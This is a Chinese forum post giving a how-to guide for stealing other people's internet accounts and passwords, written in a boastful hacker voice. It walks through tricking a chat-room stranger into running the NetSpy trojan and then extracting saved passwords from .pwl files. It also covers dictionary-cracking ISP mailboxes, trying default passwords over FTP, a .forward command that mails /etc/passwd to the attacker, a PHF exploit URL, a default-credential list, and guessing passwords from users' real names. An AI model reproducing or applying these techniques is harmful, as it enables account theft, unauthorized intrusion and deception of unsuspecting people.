找回密码
 注册

QQ登录

只需一步,快速开始

如何得到别人的上网帐号和密码

[复制链接]
发表于 2011-1-12 21:03:35 | 显示全部楼层 |阅读模式
如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。) J; Y6 I4 C, Z9 y% m+ q1 o, ?
方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。0 @2 p8 A2 Y1 s9 m' [! G
优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......  ~6 B+ f: X+ b- y
缺点:只有一个,那就是如何让对方乖乖的运行你的程序。7 Z) x+ ?1 ~+ A/ W! X' R9 D
提示:先问清你的目标和你是不是在一个城市。
2 l8 c- P% Y7 }% Q, R实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。
$ t$ g( K* B/ G: _/ _+ a  z哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。* Z3 N" ^* q( l1 \# U
忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。
& M, ]+ r2 s5 R3 h0 ?( ^0 {3 P方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客
6 s+ M( x- @5 h0 z2 F6 [优点:没什么优点7 g) |6 v6 w% C7 q( U
缺点:要具体情况具体对待,太麻烦
, r( Z. j9 h0 E4 A5 D& a7 o7 O提示:平时多多留神。
  x& p2 n1 A" }0 `# n* H' w譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net
; u2 O+ @5 K/ `; v& f密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。
( \( }. C* a: N0 b运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破
& @: M: X" P. c! a% K; s+ M0 m3 s方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。
9 E" O. M* `6 n$ l/ L9 B7 @优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。
0 g4 w4 }1 j5 `) [" a' o, g0 T% M7 {: K缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。
* J  Y6 z; z3 P9 R( L由于介绍此类的教学文章比较多,我就不班门弄斧了。
" a. U* {, p' P7 z* m6 ?8 [
( I4 k9 s8 ^$ t; N) e; Q哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。
* X& U% P4 A7 D9 x. z# a只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。
4 y# o1 s& z( Z" i$ C有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:
6 y3 I" x7 O6 h" W0 [7 ^% n4 E4 f0 O3 T& }' h# o; Z: |
------------------------------2 e; T/ u: B7 o; r

& T1 b7 R- E1 D& r- yXXX,你好(XX是你在表格上填的名字)
% b) d' L* J+ B; n$ ]" J你在XX热线的主页空间已开通9 w* }* O8 c) C
帐户名:XXX 密码:11
9 b/ X( m/ Y$ Y-----------XX热线/ B  U5 I  M; ?+ L% E( T/ f% F
电话:XXXX-XXXXXXXX4 P+ S) Q" r& L8 |5 K( Z
------------------------------
( ^# r- {/ N+ J' I8 r( p8 }/ M: M% B# {7 j5 W7 [4 P
好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。
* c3 e' R  `, t. s: Z6 s5 _开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。* b# a' P* p' h# Q* p1 b
上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!
+ Q( W) P1 L  ^5 b, T  4 n  r8 E' z' D, i/ L+ Z7 J5 H! @3 ^
- f( c( g) n7 Y# `. s6 l9 X2 ^
                           如何获得第一个帐号
0 g0 h7 t! j; X( o1 m
+ Y8 N1 b3 {" C& k  x我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.
+ R7 n3 s4 Q) v4 S, _* L% z
& ]+ u) j* b& N8 y" T确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。8 ~6 E- P/ g, ?- `4 `* T0 r. z2 j
4 c* `3 r; _3 P, _) A" ]9 z) v5 y8 G
如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.. T2 a4 g# Y2 e1 x
5 F! d+ T6 H) h4 W
以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-< ! `" [/ X' h9 M1 ?% s) q
5 Z% a1 j- z3 o
还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!
: _! V8 J1 ?; C; O% q9 L
4 j5 P$ `" |- p% T$ j+ Q. O很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:. n! H: d! c5 T% O: y* d
. o- L) u( q9 E. W3 |5 U/ Y' x. A
帐号     密码
; f, A! E' U7 e# |7 H----------- ----------------
5 W/ u& j0 f/ ^+ U' J5 Y. `: nroot    root
6 ^# }" s) x9 P! a3 A3 Zsys     sys/system/bin
6 V! o# @+ e" i& Nbin     sys/bin
$ E7 W4 f# f4 M) A  Y: L5 Ymountfsys  mountfsys
' V: B* U9 S( X( |0 ?) s2 o- ]adm     adm
  o1 n, w  h' P8 E+ p4 ?. nuucp    uucp8 S4 O7 U* A- H9 j! Z+ y
nuucp    anon
! Y: D$ I- z+ m6 m. Xanon    anon8 \& ]( d) j& i4 p2 I6 A) E' x
user    user2 A# W! R, Y; w1 e9 T
games    games
: P) X: b5 o$ W4 E1 Winstall   install
( x- L$ V' h1 w, [3 lreboot   给 "command login" 用的
9 \" p$ P- L% y; q1 i, ?# kdemo    demo, |* f. s# R+ \6 t
umountfsys umountfsys. `6 f7 N0 E2 |/ ?5 y+ n: r
sync     sync
; R! X" G# f' \/ t7 xadmin    admin  c& u" z2 |' M. l9 K( A
guest    guest
1 I  Q$ C1 \: Z# Tdaemon   daemon; ~7 i) F. @( ], T) m4 ^* K
________________________________________________________________
. h* O* D3 b% z3 y2 h( i) ~* s, A5 |; X$ f% a9 y% c
有些管理员忘记把他们改掉,那你就发财了!
/ \2 h! m- g( C0 `6 f% C
% R4 k4 S( G3 `* j9 i$ B另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.
0 m9 c9 W8 W4 M
9 `7 R9 |9 j; G只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:0 `% Y/ n* p$ W+ L, j
9 e' x+ p1 C4 C: C; R' b( I8 i. Y
.........
4 u% g% O1 e$ r: U! U6 r' W4 o+ i% ]" w  V8 n. w
xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh. r% o% x6 l. V4 x" z2 V

! u; v% c2 W' v7 z" g9 j8 t" qqingyuan:x:275:50::/usr/qingyuan:/bin/sh
# }# ?6 w& U) R7 ]+ K9 ]- t+ {" V2 V3 \; c% c; c. `
hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
& A* S7 D4 I9 s9 p* Q  V
+ q) }7 e; G; J! z1 y9 {* csmlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh6 ]9 J0 ^* a) E$ F* U$ I) d  z

9 |0 N1 G, {- ]; M9 q& fkyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh
: M, A8 j$ y2 E& s
5 Y" t( ~4 A5 \  B8 L# Pbrlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh# N0 u& {! P# C) D- p) Z

, `  |0 k; m. g5 \; Z6 vtide:x:301:50:Wang XinYi:/usr/tide:/bin/sh5 C- w! q# B6 K5 p3 f/ q

3 C. R, k) \# C1 S............* X" x/ T9 m& ]+ s& m3 B
  A* {2 }# Z3 j) x: G
这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.. S1 \  G+ {  V8 m; p8 T7 g5 m

/ f! P8 x9 ^/ W9 L如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.
8 p0 B% M" m" k1 W( A$ l% c, f5 }$ _' Z3 ], l
当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.
" H( @. x3 M# B5 y' v6 C% v. o$ p! ~: K9 v( h1 y- n6 J' ?
如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.6 P, x' p( Z4 D) t7 L

- s% x6 C* q( l3 X) X最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.
2 [, z  l/ M# x. l( G9 I. T3 z% t/ U( i$ G
你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我.9 r4 W) i1 @6 ]/ B9 C, D9 I

) B& M8 a* e- B1 c" B/ r2 A( ]
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2025-11-1 12:42

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表